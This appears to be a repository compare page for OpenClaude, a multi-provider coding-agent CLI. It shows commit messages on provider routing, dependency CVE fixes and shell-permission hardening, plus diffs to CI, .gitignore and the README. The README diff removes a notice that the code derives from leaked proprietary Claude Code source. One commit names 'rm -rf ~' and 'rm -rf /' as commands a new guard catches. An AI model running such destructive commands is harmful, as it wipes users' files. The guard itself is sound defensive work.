Compare commits

...

34 Commits

Author SHA1 Message Date
Kevin Codex
94de37d44f chore: release 0.1.8 2026-04-06 13:45:02 +08:00
Kevin Codex
3b3aca716d test: fix post-merge suite regressions (#419) 2026-04-06 13:32:05 +08:00
Juan Camilo Auriti
d5852ca73d fix: coalesce consecutive same-role messages for strict template models (#241)
Models served through Ollama/vLLM with strict Jinja templates (Devstral,
Mistral, etc.) require strict user↔assistant role alternation and reject
requests with consecutive messages of the same role.

convertMessages() could produce consecutive user or assistant messages in
three scenarios: batched user input, text-only + tool_use assistant turns,
and tool result remainders followed by another user message.

Added a coalescing pass at the end of convertMessages() that merges
consecutive same-role messages (string concat or array concat), preserving
tool_calls on assistant messages. Tool and system messages are excluded
from coalescing as they have their own alternation rules.

Includes regression tests for both user and assistant coalescing.

Fixes #202
2026-04-06 06:47:11 +08:00
Technomancer702
c534aa5771 Feature: Add local OpenAI-compatible model discovery to /model (#201)
* Add local OpenAI-compatible model discovery to /model

* Guard local OpenAI model discovery from Codex routing

* Preserve remote OpenAI Codex alias behavior
2026-04-06 06:46:06 +08:00
Juan Camilo Auriti
60d3d8961a fix: add missing o1-series and Ollama models to context window table (#250)
Models not in the lookup table fall through to a 200k default, causing
auto-compact to never trigger for models with smaller actual context
windows. Users hit hard context_window_exceeded errors instead.

Added to both context window and max output token tables:
- o1, o1-mini, o1-preview, o1-pro (OpenAI reasoning models)
- llama3.2:1b, qwen3:8b, codestral (common Ollama models)

Relates to #248
2026-04-06 06:39:24 +08:00
Juan Camilo Auriti
3b9893b586 security: force lodash-es 4.18.0 for transitive dependencies (#242)
* security: force lodash-es 4.18.0 for transitive dependencies

PR #225 bumped the direct lodash-es dependency to 4.18.0, but
@anthropic-ai/sandbox-runtime still pulled lodash-es@4.17.23 via its
own ^4.17.23 range. The transitive copy was vulnerable to:

- HIGH: Code Injection via _.template (GHSA-r5fr-rjxr-66jc)
- MODERATE: Prototype Pollution via _.unset/_.omit (GHSA-f23m-r3pf-42rh)

Added overrides field in package.json to force all copies to 4.18.0.
bun audit now reports zero vulnerabilities.

* fix: use lodash-es 4.18.1 instead of deprecated 4.18.0

lodash-es 4.18.0 is explicitly deprecated by the maintainer with
the message "Bad release. Please use lodash-es@4.17.23 instead."
Updated both the direct dependency and the override to 4.18.1, which
is the latest non-deprecated release that patches the CVEs.
2026-04-06 06:37:40 +08:00
Joe Tam
daf2c90b6d Fix duplicate marketplace plugin loading (#364)
Reproduction:
- Enable `frontend-design@claude-code-plugins`
- Enable `frontend-design@claude-plugins-official`
- Start OpenClaude with both marketplace plugins active
- Both plugins load, but downstream command and skill scopes key off the short plugin name, so both collapse to `frontend-design` and can interfere with interactive startup

Fix:
- Collapse duplicate marketplace plugins by short name during merge
- Keep the enabled copy when enabled state differs; otherwise keep the later config entry
- Add regression coverage for both cases
2026-04-06 06:36:45 +08:00
CRABHIVE
4ac7367733 fix: include retry timing in 429 error messages (#366)
## Summary

- Extract retry-after header from 429 API errors and include timing
  guidance in the user-facing error message
- Previously, non-quota 429 errors showed a generic message with no
  guidance on when to retry, only a link to status.anthropic.com

## Impact

- user-facing impact: 429 error messages now tell users when to retry
  instead of just linking to a status page
- developer/maintainer impact: none

## Testing

- [x] `bun run build`
- [ ] `bun run smoke`
- [ ] focused tests: error formatting is pure string construction,
  verified via build + manual inspection

## Notes

- provider/model path tested: applies to all providers returning 429
- screenshots attached (if UI changed): n/a
- follow-up work or known limitations: 529 errors could get similar
  treatment in a follow-up

https://claude.ai/code/session_01D7kprMn4c66a5WrZscF7rv

Co-authored-by: Claude <noreply@anthropic.com>
2026-04-06 06:36:14 +08:00
Kevin Codex
7350a798cb Feature/pr intent scan hardening (#375)
* security: harden suspicious PR intent scanner

* security: reduce pr scanner false positives
2026-04-05 17:05:24 +08:00
Kevin Codex
5ef79546e9 test: stabilize suite and add coverage heatmap (#373)
* test: stabilize suite and add coverage heatmap

* ci: run full bun test suite in pr checks
2026-04-05 12:44:54 +08:00
Anandan
daa3aa27a0 Remove internal-only bundled skills and mock helpers (#376)
* Remove internal-only bundled skills and mock rate-limit behavior

This takes the next planned Phase C-lite slice by deleting bundled skills
that only ever registered for internal users and replacing the internal
mock rate-limit helper with a stable no-op external stub. The external
build keeps the same behavior while removing a concentrated block of
USER_TYPE-gated dead code.

Constraint: Limit this PR to isolated internal-only helpers and avoid bridge, oauth, or rebrand behavior
Rejected: Broad USER_TYPE cleanup across mixed runtime surfaces | too risky for the next medium-sized PR
Confidence: high
Scope-risk: moderate
Reversibility: clean
Directive: The next cleanup pass should continue with similarly isolated USER_TYPE helpers before touching main.tsx or protocol-heavy code
Tested: bun run build
Tested: bun run smoke
Tested: bun run verify:privacy
Tested: bun run test:provider
Tested: bun run test:provider-recommendation
Not-tested: Full repo typecheck (upstream baseline remains noisy)

* Align internal-only helper removal with remaining user guidance

This follow-up fixes the mock billing stub to be a true no-op and removes
stale user-facing references to /verify and /skillify from the same PR.
It also leaves a clearer paper trail for review: the deleted verify skill
was explicitly ant-gated before removal, and the remaining mock helper
callers still resolve to safe no-op returns in the external build.

Constraint: Keep the PR focused on consistency fixes and reviewer-requested evidence, not new cleanup scope
Rejected: Leave stale guidance for a later PR | would make this branch internally inconsistent after skill removal
Confidence: high
Scope-risk: narrow
Reversibility: clean
Directive: When deleting gated features, always sweep user guidance and coordinator prompts in the same pass
Tested: bun run build
Tested: bun run smoke
Tested: bun run verify:privacy
Tested: bun run test:provider
Tested: bun run test:provider-recommendation
Not-tested: Full repo typecheck (upstream baseline remains noisy; changed-file scan still shows only pre-existing tipRegistry errors outside edited lines)

* Clarify generic workflow wording after skill removal

This removes the last generic verification-skill wording that could still
be read as pointing at a deleted bundled command. The guidance now talks
about project workflows rather than a specific bundled verify skill.

Constraint: Keep the follow-up limited to reviewer-facing wording cleanup on the same PR
Rejected: Leave generic wording as-is | still too easy to misread after the explicit /verify references were removed
Confidence: high
Scope-risk: narrow
Reversibility: clean
Directive: When removing bundled commands, scrub both explicit and generic references in the same branch
Tested: bun run build
Tested: bun run smoke
Not-tested: Additional checks unchanged by wording-only follow-up

---------

Co-authored-by: anandh8x <test@example.com>
2026-04-05 12:44:21 +08:00
Anandan
5ff34283c4 Stub internal-only recording and model capability helpers (#377)
This follow-up Phase C-lite slice replaces purely internal helper modules
with stable external no-op surfaces and collapses internal elevated error
logging to a no-op. The change removes additional USER_TYPE-gated helper
behavior without touching product-facing runtime flows.

Constraint: Keep this PR limited to isolated helper modules that are already external no-ops in practice
Rejected: Pulling in broader speculation or logging sink changes | less isolated and easier to debate during review
Confidence: high
Scope-risk: narrow
Reversibility: clean
Directive: Continue Phase C with similarly isolated helpers before moving into mixed behavior files
Tested: bun run build
Tested: bun run smoke
Tested: bun run verify:privacy
Tested: bun run test:provider
Tested: bun run test:provider-recommendation
Not-tested: Full repo typecheck (upstream baseline remains noisy)

Co-authored-by: anandh8x <test@example.com>
2026-04-05 12:44:03 +08:00
Kevin Codex
d1a2df2f69 feat: activate buddy system in open build (#346) 2026-04-05 05:39:00 +08:00
Anandan
ba1b9913aa Finish eliminating remaining ANT-ONLY source labels (#360)
This extends the label-only cleanup to the remaining internal-only command,
debug, and heading strings so the source tree no longer contains ANT-ONLY
markers. The pass still avoids logic changes and only renames labels shown
in internal or gated surfaces.

Constraint: Update the existing label-cleanup PR without widening scope into behavior changes
Rejected: Leave the last ANT-ONLY strings for a later pass | low-cost cleanup while the branch is already focused on labels
Confidence: high
Scope-risk: narrow
Reversibility: clean
Directive: The next phase should move off label cleanup and onto a separately scoped logic or rebrand slice
Tested: bun run build
Tested: bun run smoke
Tested: bun run verify:privacy
Tested: bun run test:provider
Tested: bun run test:provider-recommendation
Not-tested: Full repo typecheck (upstream baseline remains noisy)

Co-authored-by: anandh8x <test@example.com>
2026-04-04 23:58:34 +05:30
Anandan
0d27ca596a Neutralize remaining internal-only diagnostic labels (#359)
This pass rewrites a small set of ant-only diagnostic and UI labels to
neutral internal wording while leaving command definitions, flags, and
runtime logic untouched. It focuses on internal debug output, dead UI
branches, and noninteractive headings rather than broader product text.

Constraint: Label cleanup only; do not change command semantics or ant-only logic gates
Rejected: Renaming ant-only command descriptions in main.tsx | broader UX surface better handled in a separate reviewed pass
Confidence: high
Scope-risk: narrow
Reversibility: clean
Directive: Remaining ANT-ONLY hits are mostly command descriptions and intentionally deferred user-facing strings
Tested: bun run build
Tested: bun run smoke
Tested: bun run verify:privacy
Tested: bun run test:provider
Tested: bun run test:provider-recommendation
Not-tested: Full repo typecheck (upstream baseline remains noisy)

Co-authored-by: anandh8x <test@example.com>
2026-04-04 23:50:15 +05:30
Anandan
8fc40ee8c4 Neutralize internal Anthropic prose in explanatory comments (#357)
This is a small prose-only follow-up that rewrites clearly internal or
explanatory Anthropic comment language to neutral wording in a handful of
high-confidence files. It avoids runtime strings, flags, command labels,
protocol identifiers, and provider-facing references.

Constraint: Keep this pass narrowly scoped to comments/documentation only
Rejected: Broader Anthropic comment sweep across functional API/protocol references | too ambiguous for a safe prose-only PR
Confidence: high
Scope-risk: narrow
Reversibility: clean
Directive: Leave functional Anthropic references (API behavior, SDKs, URLs, provider labels, protocol docs) for separate reviewed passes
Tested: bun run build
Tested: bun run smoke
Tested: bun run verify:privacy
Tested: bun run test:provider
Tested: bun run test:provider-recommendation
Not-tested: Full repo typecheck (upstream baseline remains noisy)

Co-authored-by: anandh8x <test@example.com>
2026-04-04 23:35:03 +05:30
Anandan
2f162af60c Reduce internal-only labeling noise in source comments (#355)
This pass rewrites comment-only ANT-ONLY markers to neutral internal-only
language across the source tree without changing runtime strings, flags,
commands, or protocol identifiers. The goal is to lower obvious internal
prose leakage while keeping the diff mechanically safe and easy to review.

Constraint: Phase B is limited to comments/prose only; runtime strings and user-facing labels remain deferred
Rejected: Broad search-and-replace across strings and command descriptions | too risky for a prose-only pass
Confidence: high
Scope-risk: narrow
Reversibility: clean
Directive: Remaining ANT-ONLY hits are mostly runtime/user-facing strings and should be handled separately from comment cleanup
Tested: bun run build
Tested: bun run smoke
Tested: bun run verify:privacy
Tested: bun run test:provider
Tested: bun run test:provider-recommendation
Not-tested: Full repo typecheck (upstream baseline remains noisy)

Co-authored-by: anandh8x <test@example.com>
2026-04-04 23:26:14 +05:30
Anandan
9e84d2fddc Remove internal-only tooling from the external build (#352)
* Remove internal-only tooling without changing external runtime contracts

This trims the lowest-risk internal-only surfaces first: deleted internal
modules are replaced by build-time no-op stubs, the bundled stuck skill is
removed, and the insights S3 upload path now stays local-only. The privacy
verifier is expanded and the remaining bundled internal Slack/Artifactory
strings are neutralized without broad repo-wide renames.

Constraint: Keep the first PR deletion-heavy and avoid mass rewrites of USER_TYPE, tengu, or claude_code identifiers
Rejected: One-shot DMCA cleanup branch | too much semantic risk for a first PR
Confidence: medium
Scope-risk: moderate
Reversibility: clean
Directive: Treat full-repo typecheck as a baseline issue on this upstream snapshot; do not claim this commit introduced the existing non-Phase-A errors without isolating them first
Tested: bun run build
Tested: bun run smoke
Tested: bun run verify:privacy
Not-tested: Full repo typecheck (currently fails on widespread pre-existing upstream errors outside this change set)

* Keep minimal source shims so CI can import Phase A cleanup paths

The first PR removed internal-only source files entirely, but CI provider
and context tests import those modules directly from source rather than
through the build-time no-telemetry stubs. This restores tiny no-op source
shims so tests and local source imports resolve while preserving the same
external runtime behavior.

Constraint: GitHub Actions runs source-level tests in addition to bundled build/privacy checks
Rejected: Revert the entire deletion pass | unnecessary once the import contract is satisfied by small shims
Confidence: high
Scope-risk: narrow
Reversibility: clean
Directive: For later cleanup phases, treat build-time stubs and source-test imports as separate compatibility surfaces
Tested: bun run build
Tested: bun run smoke
Tested: bun run verify:privacy
Tested: bun run test:provider
Tested: bun run test:provider-recommendation
Not-tested: Full repo typecheck (still noisy on this upstream snapshot)

---------

Co-authored-by: anandh8x <test@example.com>
2026-04-04 23:04:34 +05:30
KRATOS
75d2543854 fix: remove internal Anthropic tooling from external build (#345)
Remove debug systems, employee detection, and internal logging
that have no function in a community fork.

Changes:
- Remove logPermissionContextForAnts import and calls (main.tsx, compact.ts)
  Reads Kubernetes namespace and container IDs from internal infra paths.
  Dead code for all external users.

- Remove createDumpPromptsFetch import and gate (query.ts)
  Internal prompt dump system for employee debugging.
  Replace gate with unconditional undefined — normal fetch always used.

- Remove stripSignatureBlocks ant-only block (query.ts)
  Was behind USER_TYPE === 'ant' guard, never ran for external users.

- Hardcode isAnt: false (query/config.ts)
  Employee detection flag has no place in a community fork.
  config.gates.isAnt had exactly one consumer (dumpPromptsFetch, now removed).

- Gut logClassifierResultForAnts body (bashPermissions.ts)
  Replace with empty no-op. Still called from 4 sites, zero execution.
  Remove ANT-ONLY comments describing internal security model.

- Gate status.anthropic.com behind firstParty check (errors.ts)
  429 error hint now only shown when using Anthropic directly.
  Third-party provider users see a generic capacity message.

Build: passes
Typecheck: clean (no new errors)
Tests: 196 pass, same 6 pre-existing failures unrelated to these changes
2026-04-04 21:23:17 +05:30
KRATOS
01acc4c10e fix: auto-allow safe read-only commands in acceptEdits mode (#341)
* fix: auto-allow safe read-only commands in acceptEdits mode

In acceptEdits mode, read-only commands like grep, cat, ls, find, head,
tail were still prompting for approval. This created unnecessary friction
since these commands cannot modify or delete files.

Add safe read-only commands to ACCEPT_EDITS_ALLOWED_COMMANDS:
  grep, cat, ls, find, head, tail, echo, pwd, wc, sort, uniq, diff

These are all read-only — they cannot cause data loss or modify the
filesystem. Auto-allowing them reduces approval fatigue in acceptEdits
mode without introducing any safety risk.

Write commands (rm, rmdir, mv, cp, sed, mkdir, touch) are unchanged.
The dangerous path guard for rm/rmdir remains in place.

Fixes #251.

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>

* fix(bash): block unsafe acceptEdits auto-allow

Keep the new read-only acceptEdits commands behind the existing read-only validator and block shell redirection based on the original command text. This prevents commands like echo > file and find -delete from being silently auto-approved while preserving safe read-only commands.

Co-Authored-By: Claude <noreply@anthropic.com>

---------

Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
2026-04-04 22:53:09 +08:00
JiayuWang(王嘉宇)
e4cf810e14 fix: guard rawBaseUrl against the literal string "undefined" from env vars (#340)
On Windows, shells can set OPENAI_BASE_URL to the literal string
"undefined" when the variable is referenced without quotes while unset.
The nullish-coalescing operator (??) does not catch this because
"undefined" is a truthy string, causing resolveProviderRequest() to
treat it as a real base URL. This broke the Codex transport check:
(!rawBaseUrl && isCodexAlias(model)) evaluated as (false || true) = false
so the transport was incorrectly set to chat_completions (issue #336).

Fix: introduce asEnvUrl() which trims the value and rejects both empty
strings and the sentinel string "undefined". Use it for all three
rawBaseUrl sources (options.baseUrl, OPENAI_BASE_URL, OPENAI_API_BASE).

Tests: add three new cases to the 'Codex provider config' describe block
covering the empty-string, "undefined"-string, and options-override
scenarios. Also add beforeEach/afterEach guards so individual tests
cannot contaminate each other via env var state.

Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
2026-04-04 22:37:59 +08:00
KRATOS
0951c8bc59 fix: run dangerous path check before auto-allowing rm/rmdir in acceptEdits mode (#246)
In acceptEdits mode, filesystem commands (rm, rmdir, mv, cp, sed, mkdir,
touch) were returned as 'allow' before checkDangerousRemovalPaths ran.
This meant rm -rf ~ and rm -rf / bypassed the dangerous path guard entirely.

Fix:
- Export checkDangerousRemovalPaths from pathValidation.ts
- In modeValidation.ts, call it for rm/rmdir before returning allow
- Safe paths (rm file.txt) continue to auto-allow unchanged
- Dangerous paths (rm -rf ~) now return 'ask' requiring user approval

This is a defense-in-depth guard that matters most for 3P models (local
Ollama, DeepSeek etc.) that lack built-in refusal training and would
blindly execute destructive commands in acceptEdits mode.

Fixes finding 3 from issue #244.

Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
2026-04-04 19:32:02 +05:30
Vasanth T
4c3118e071 fix: harden execFileNoThrow for CodeQL (#338) 2026-04-04 21:39:54 +08:00
Vasanth T
80a2f1414c docs: organize Python helpers and refresh README (#334)
* docs: organize Python helpers and refresh README

* docs: add README status badges

* test: centralize Python helper test imports

* docs: add short provenance disclaimer
2026-04-04 21:24:36 +08:00
Anandan
462a985d7e Remove embedded source map directives from tracked sources (#329)
Inline base64 source maps had been checked into tracked src files. This strips those comments from the repository without changing runtime behavior or adding ongoing guardrails, per the requested one-time cleanup scope.

Constraint: Keep this change limited to tracked source cleanup only
Rejected: Add CI/source verification guard | user requested one-time cleanup only
Confidence: high
Scope-risk: narrow
Reversibility: clean
Directive: If these directives reappear, fix the producing transform instead of reintroducing repo-side cleanup code
Tested: rg -n "sourceMappingURL" ., bun run smoke, bun run verify:privacy, bun run test:provider, npm run test:provider-recommendation
Not-tested: bun run typecheck (repository has many pre-existing unrelated failures)

Co-authored-by: anandh8x <test@example.com>
2026-04-04 21:19:27 +08:00
Agent_J
ef881b247f feat(provider): align provider and model workflows (#324)
* feat(provider): align provider and model workflows

* fix(provider): clear gemini/github flags and use local ollama default

* fix(provider): preserve explicit startup provider selection

* fix(provider): clear env when deleting last profile

* chore(provider): apply review nits in ProviderManager

* fix(provider): preserve explicit env on last-profile delete

* fix(provider): preserve explicit env when profile marker is stale

---------

Co-authored-by: Gitlawb <gitlawb@users.noreply.github.com>
2026-04-04 20:29:45 +08:00
Vasanth T
a0bdab24c0 fix: address remaining CodeQL alerts (#332) 2026-04-04 20:28:35 +08:00
KRATOS
cdc92d16e4 fix(repl): queue prompt guidance for next turn (#333)
Keep normal prompt submissions during generation queued instead of interrupting the current turn. Add a visible next-turn banner in the prompt area so users can tell their follow-up guidance was accepted, and cover the new behavior with focused tests.

Fixes #328

Co-authored-by: Claude <noreply@anthropic.com>
2026-04-04 20:27:59 +08:00
Juan Camilo Auriti
fbf3385395 fix: prevent cross-provider model env var leaks and sync Codex detection (#243)
Two provider routing bugs that cause silent wrong-model failures:

1. model.ts: getUserSpecifiedModelSetting() read ANTHROPIC_MODEL ||
   GEMINI_MODEL || OPENAI_MODEL with no provider check. A user
   switching from Anthropic to OpenAI with ANTHROPIC_MODEL still set
   would silently send the Anthropic model name to the OpenAI API.
   Now gates each env var behind the active provider from
   getAPIProvider().

2. providers.ts: isCodexModel() maintained a hardcoded list of 8 model
   names that was missing gpt-5.4-mini and gpt-5.2 from the canonical
   CODEX_ALIAS_MODELS table in providerConfig.ts. This caused a
   split-brain: getAPIProvider() returned 'openai' while
   resolveProviderRequest() selected 'codex_responses' transport.
   Now delegates to the exported isCodexAlias() to keep both detection
   systems in sync.
2026-04-04 17:38:47 +08:00
Vasanth T
ea335aeddc feat: add Gemini ADC and access token auth (#312)
* feat: add Gemini ADC and access token auth

* feat: add Gemini token and ADC provider setup

* feat: add Gemini token and ADC provider setup

* fix: honor Gemini auth mode on restart
2026-04-04 17:37:17 +08:00
RUO
280c9732f5 feat: fix open-source build and add Ollama model picker (#302)
* feat: fix open-source build and add Ollama model picker

- Fix build failures by stubbing 62+ missing Anthropic-internal modules
  with a catch-all plugin in scripts/build.ts
- Add runtime shim exports (isReplBridgeActive, getReplBridgeHandle) in
  bootstrap/state.ts for feature-gated code references
- Add /model picker support for Ollama: fetches available models from
  Ollama server at startup and displays them in the model selection menu
- Add Ollama model validation against cached server model list

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix: address PR review feedback for Ollama integration

- Move Ollama validation before enterprise allowlist check in validateModel
- Truncate model list in error messages to first 5 entries
- Fix isOllamaProvider() to detect OLLAMA_BASE_URL-only configurations
- Reuse getOllamaApiBaseUrl() from providerDiscovery instead of duplicating
- Reset fetchPromise on failure to allow retry in prefetchOllamaModels
- Include Default option in Ollama model picker, prevent Claude model fallthrough
- Add file existence check for src/tasks/ stubs in build script

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix: use pre-scanned exact-match resolvers to avoid Bun bundler corruption

Bun's onResolve plugin corrupts the module graph even when returning null
for non-matching imports. This caused lodash-es memoize and zod's util
namespace to be incorrectly tree-shaken, producing runtime ReferenceErrors.

Replace all pattern-based onResolve hooks with a pre-build scan that
identifies missing modules upfront, then registers exact-match resolvers
only for confirmed missing imports. This avoids touching any valid module
resolution paths.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix: move Ollama model prefetch outside startup throttle gate

prefetchOllamaModels() was inside the skipStartupPrefetches condition,
so it would be skipped on subsequent launches due to the bgRefresh
throttle timestamp. Ollama model fetch targets a local/remote server
and is fast & cheap, so it should always run at startup.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
2026-04-04 17:22:18 +08:00
KRATOS
08be5181ab fix: skip Anthropic preconnect for third-party providers (#309) 2026-04-04 17:21:18 +08:00
KRATOS
b4725c19e0 fix: skip Anthropic MCP registry fetch for third-party providers (#310) 2026-04-04 17:20:48 +08:00
pr0ln
3c2e80a1ae Fix TUI redraw artifacts in row-based views (#325)
Co-authored-by: pr0ln <pr0ln@pr0lnui-Macmini.local>
2026-04-04 17:19:31 +08:00
738 changed files with 6970 additions and 4732 deletions

View File

@@ -16,6 +16,8 @@ jobs:
steps: steps:
- name: Check out repository - name: Check out repository
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2
with:
fetch-depth: 0
- name: Set up Node.js - name: Set up Node.js
uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4.4.0 uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4.4.0
@@ -33,6 +35,11 @@ jobs:
- name: Smoke check - name: Smoke check
run: bun run smoke run: bun run smoke
- name: Full unit test suite
run: bun test --max-concurrency=1
- name: Suspicious PR intent scan
run: bun run security:pr-scan -- --base ${{ github.event.pull_request.base.sha || 'origin/main' }}
- name: Provider tests - name: Provider tests
run: bun run test:provider run: bun run test:provider

1
.gitignore vendored
View File

@@ -6,3 +6,4 @@ dist/
!.env.example !.env.example
.openclaude-profile.json .openclaude-profile.json
reports/ reports/
coverage/

178
README.md
View File

@@ -1,33 +1,24 @@
# OpenClaude # OpenClaude
OpenClaude is an open-source coding-agent CLI that works with more than one model provider. OpenClaude is an open-source coding-agent CLI for cloud and local model providers.
Use OpenAI-compatible APIs, Gemini, GitHub Models, Codex, Ollama, Atomic Chat, and other supported backends while keeping the same terminal-first workflow: prompts, tools, agents, MCP, slash commands, and streaming output. Use OpenAI-compatible APIs, Gemini, GitHub Models, Codex, Ollama, Atomic Chat, and other supported backends while keeping one terminal-first workflow: prompts, tools, agents, MCP, slash commands, and streaming output.
[![PR Checks](https://github.com/Gitlawb/openclaude/actions/workflows/pr-checks.yml/badge.svg?branch=main)](https://github.com/Gitlawb/openclaude/actions/workflows/pr-checks.yml)
[![Release](https://img.shields.io/github/v/tag/Gitlawb/openclaude?label=release&color=0ea5e9)](https://github.com/Gitlawb/openclaude/tags)
[![Discussions](https://img.shields.io/badge/discussions-open-7c3aed)](https://github.com/Gitlawb/openclaude/discussions)
[![Security Policy](https://img.shields.io/badge/security-policy-0f766e)](SECURITY.md)
[![License](https://img.shields.io/badge/license-MIT-2563eb)](LICENSE)
[Quick Start](#quick-start) | [Setup Guides](#setup-guides) | [Providers](#supported-providers) | [Source Build](#source-build-and-local-development) | [VS Code Extension](#vs-code-extension) | [Community](#community)
## Why OpenClaude ## Why OpenClaude
- Use one CLI across cloud and local model providers - Use one CLI across cloud APIs and local model backends
- Save provider profiles inside the app with `/provider` - Save provider profiles inside the app with `/provider`
- Run locally with Ollama or Atomic Chat - Run with OpenAI-compatible services, Gemini, GitHub Models, Codex, Ollama, Atomic Chat, and other supported providers
- Keep core coding-agent workflows: bash, file tools, grep, glob, agents, tasks, MCP, and web tools - Keep coding-agent workflows in one place: bash, file tools, grep, glob, agents, tasks, MCP, and web tools
- Use the bundled VS Code extension for launch integration and theme support
## Provenance & Legal Notice
OpenClaude is derived from Anthropic's Claude Code CLI source code, which was
inadvertently exposed in March 2026 through a packaging error in npm. The
original Claude Code source is proprietary software owned by Anthropic PBC.
This project adds multi-provider support, strips telemetry, and adapts the
codebase for open use. It is not an authorized fork or open-source release
by Anthropic.
**"Claude" and "Claude Code" are trademarks of Anthropic PBC.**
Contributors should be aware that the legal status of distributing code
derived from Anthropic's proprietary source is unresolved. See the LICENSE
file for details.
---
## Quick Start ## Quick Start
@@ -37,7 +28,7 @@ file for details.
npm install -g @gitlawb/openclaude npm install -g @gitlawb/openclaude
``` ```
If the npm install path later reports `ripgrep not found`, install ripgrep system-wide and confirm `rg --version` works in the same terminal before starting OpenClaude. If the install later reports `ripgrep not found`, install ripgrep system-wide and confirm `rg --version` works in the same terminal before starting OpenClaude.
### Start ### Start
@@ -47,8 +38,8 @@ openclaude
Inside OpenClaude: Inside OpenClaude:
- run `/provider` for guided setup of OpenAI-compatible, Gemini, Ollama, or Codex profiles - run `/provider` for guided provider setup and saved profiles
- run `/onboard-github` for GitHub Models setup - run `/onboard-github` for GitHub Models onboarding
### Fastest OpenAI setup ### Fastest OpenAI setup
@@ -94,8 +85,6 @@ $env:OPENAI_MODEL="qwen2.5-coder:7b"
openclaude openclaude
``` ```
---
## Setup Guides ## Setup Guides
Beginner-friendly guides: Beginner-friendly guides:
@@ -109,38 +98,26 @@ Advanced and source-build guides:
- [Advanced Setup](docs/advanced-setup.md) - [Advanced Setup](docs/advanced-setup.md)
- [Android Install](ANDROID_INSTALL.md) - [Android Install](ANDROID_INSTALL.md)
---
## Supported Providers ## Supported Providers
| Provider | Setup Path | Notes | | Provider | Setup Path | Notes |
| --- | --- | --- | | --- | --- | --- |
| OpenAI-compatible | `/provider` or env vars | Works with OpenAI, OpenRouter, DeepSeek, Groq, Mistral, LM Studio, and compatible local `/v1` servers | | OpenAI-compatible | `/provider` or env vars | Works with OpenAI, OpenRouter, DeepSeek, Groq, Mistral, LM Studio, and other compatible `/v1` servers |
| Gemini | `/provider` or env vars | Google Gemini support through the runtime provider layer | | Gemini | `/provider` or env vars | Supports API key, access token, or local ADC workflow on current `main` |
| GitHub Models | `/onboard-github` | Interactive onboarding with saved credentials | | GitHub Models | `/onboard-github` | Interactive onboarding with saved credentials |
| Codex | `/provider` | Uses existing Codex credentials when available | | Codex | `/provider` | Uses existing Codex credentials when available |
| Ollama | `/provider` or env vars | Local inference with no API key | | Ollama | `/provider` or env vars | Local inference with no API key |
| Atomic Chat | advanced setup | Local Apple Silicon backend | | Atomic Chat | advanced setup | Local Apple Silicon backend |
| Bedrock / Vertex / Foundry | env vars | Additional provider integrations for supported environments | | Bedrock / Vertex / Foundry | env vars | Additional provider integrations for supported environments |
---
## What Works ## What Works
- Tool-driven coding workflows - **Tool-driven coding workflows**: Bash, file read/write/edit, grep, glob, agents, tasks, MCP, and slash commands
Bash, file read/write/edit, grep, glob, agents, tasks, MCP, and slash commands - **Streaming responses**: Real-time token output and tool progress
- Streaming responses - **Tool calling**: Multi-step tool loops with model calls, tool execution, and follow-up responses
Real-time token output and tool progress - **Images**: URL and base64 image inputs for providers that support vision
- Tool calling - **Provider profiles**: Guided setup plus saved `.openclaude-profile.json` support
Multi-step tool loops with model calls, tool execution, and follow-up responses - **Local and remote model backends**: Cloud APIs, local servers, and Apple Silicon local inference
- Images
URL and base64 image inputs for providers that support vision
- Provider profiles
Guided setup plus saved `.openclaude-profile.json` support
- Local and remote model backends
Cloud APIs, local servers, and Apple Silicon local inference
---
## Provider Notes ## Provider Notes
@@ -153,13 +130,9 @@ OpenClaude supports multiple providers, but behavior is not identical across all
For best results, use models with strong tool/function calling support. For best results, use models with strong tool/function calling support.
---
## Agent Routing ## Agent Routing
Route different agents to different AI providers within the same session. Useful for cost optimization (cheap model for code review, powerful model for complex coding) or leveraging model strengths. OpenClaude can route different agents to different models through settings-based routing. This is useful for cost optimization or splitting work by model strength.
### Configuration
Add to `~/.claude/settings.json`: Add to `~/.claude/settings.json`:
@@ -185,29 +158,19 @@ Add to `~/.claude/settings.json`:
} }
``` ```
### How It Works When no routing match is found, the global provider remains the fallback.
- **agentModels**: Maps model names to OpenAI-compatible API endpoints
- **agentRouting**: Maps agent types or team member names to model names
- **Priority**: `name` > `subagent_type` > `"default"` > global provider
- **Matching**: Case-insensitive, hyphen/underscore equivalent (`general-purpose` = `general_purpose`)
- **Teams**: Team members are routed by their `name` — no extra config needed
When no routing match is found, the global provider (env vars) is used as fallback.
> **Note:** `api_key` values in `settings.json` are stored in plaintext. Keep this file private and do not commit it to version control. > **Note:** `api_key` values in `settings.json` are stored in plaintext. Keep this file private and do not commit it to version control.
---
## Web Search and Fetch ## Web Search and Fetch
By default, `WebSearch` now works on non-Anthropic models using DuckDuckGo. This gives GPT-4o, DeepSeek, Gemini, Ollama, and other OpenAI-compatible providers a free web search path out of the box. By default, `WebSearch` works on non-Anthropic models using DuckDuckGo. This gives GPT-4o, DeepSeek, Gemini, Ollama, and other OpenAI-compatible providers a free web search path out of the box.
> **Note:** DuckDuckGo fallback works by scraping search results and may be rate-limited, blocked, or subject to DuckDuckGo's Terms of Service. If you want a more reliable supported option, configure Firecrawl. > **Note:** DuckDuckGo fallback works by scraping search results and may be rate-limited, blocked, or subject to DuckDuckGo's Terms of Service. If you want a more reliable supported option, configure Firecrawl.
For Anthropic-native backends (Anthropic/Vertex/Foundry) and Codex responses, OpenClaude keeps the native provider web search behavior. For Anthropic-native backends and Codex responses, OpenClaude keeps the native provider web search behavior.
